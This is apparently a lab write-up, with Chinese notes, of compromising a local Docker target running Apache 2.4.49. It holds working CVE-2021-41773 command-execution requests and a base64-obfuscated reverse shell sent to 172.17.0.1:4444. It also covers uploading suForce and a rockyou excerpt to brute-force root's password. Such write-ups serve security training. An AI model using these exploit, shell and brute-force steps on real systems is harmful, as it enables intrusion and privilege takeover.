NMAP #
[root@kali] /home/kali/thedog
❯ nmap 172.17.0.2 -sV -A -p-
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.49 ((Unix))
|_http-title: Comando Ping
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Nuclei #
[root@kali] /home/kali/thedog
❯ nuclei -u http://172.17.0.2 ⏎
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.2
projectdiscovery.io
[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 7991
[INF] Executing 7793 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 198 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1743 (Reduced 1638 Requests)
[INF] Using Interactsh Server: oast.me
[CVE-2021-41773:RCE] [http] [high] http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
[http-trace:trace-request] [http] [info] http://172.17.0.2
[http-trace:options-request] [http] [info] http://172.17.0.2
[missing-sri] [http] [info] http://172.17.0.2 ["https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"]
[waf-detect:apachegeneric] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:content-security-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://172.17.0.2
[http-missing-security-headers:referrer-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:strict-transport-security] [http] [info] http://172.17.0.2
[http-missing-security-headers:permissions-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-frame-options] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-content-type-options] [http] [info] http://172.17.0.2
[http-missing-security-headers:clear-site-data] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://172.17.0.2
[tech-detect:jsdelivr] [http] [info] http://172.17.0.2
[tech-detect:bootstrap] [http] [info] http://172.17.0.2
[apache-detect] [http] [info] http://172.17.0.2 ["Apache/2.4.49 (Unix)"]
[options-method] [http] [info] http://172.17.0.2 ["GET,POST,OPTIONS,HEAD,TRACE"]
CVE-2021-41773 #
经过信息收集，确认目标为 Apache 2.4.49 且存在 CVE-2021-41773，可通过以下方式执行命令：
[root@kali] /home/kali/thedog
❯ curl -v --data "echo;id" 'http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
* Trying 172.17.0.2:80...
* Connected to 172.17.0.2 (172.17.0.2) port 80
* using HTTP/1.x
> POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
> Host: 172.17.0.2
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Length: 7
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 7 bytes
< HTTP/1.1 200 OK
< Date: Fri, 30 May 2025 12:13:00 GMT
< Server: Apache/2.4.49 (Unix)
< Transfer-Encoding: chunked
<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Connection #0 to host 172.17.0.2 left intact
接着通过同一入口建立反弹 shell：
[root@kali] /home/kali/thedog
❯ curl -v --data "echo;printf KGJhc2ggPiYgL2Rldi90Y3AvMTcyLjE3LjAuMS80NDQ0IDA+JjEpICY=|base64 -d|bash" 'http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
Root #
由于目标无法直接下载文件，这里通过 base64 编码的方式将 suForce 传到目标上：
[root@kali] /home/kali/Desktop/suForce (main)
❯ cat suForce| base64
<base64>
www-data@a42e9cb76c1d:/tmp$ echo <base64> | base64 -d > suForce
[root@kali] /home/kali/Desktop
❯ head -n 500 /usr/share/wordlists/rockyou.txt |base64
<base64>
www-data@a42e9cb76c1d:/tmp$ echo <base64> | base64 -d > pass.txt
然后使用 suForce 对 root 的密码进行爆破：
www-data@a42e9cb76c1d:/tmp$ ./suForce -u root -w pass.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | root
📖 Wordlist | pass.txt
🔎 Status | 50/500/10%/hannah
💥 Password | hannah
───────────────────────────────────
www-data@a42e9cb76c1d:/tmp$
www-data@a42e9cb76c1d:/tmp$ su root
Password:
root@a42e9cb76c1d:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@a42e9cb76c1d:/tmp# ls /root/
root@a42e9cb76c1d:/tmp#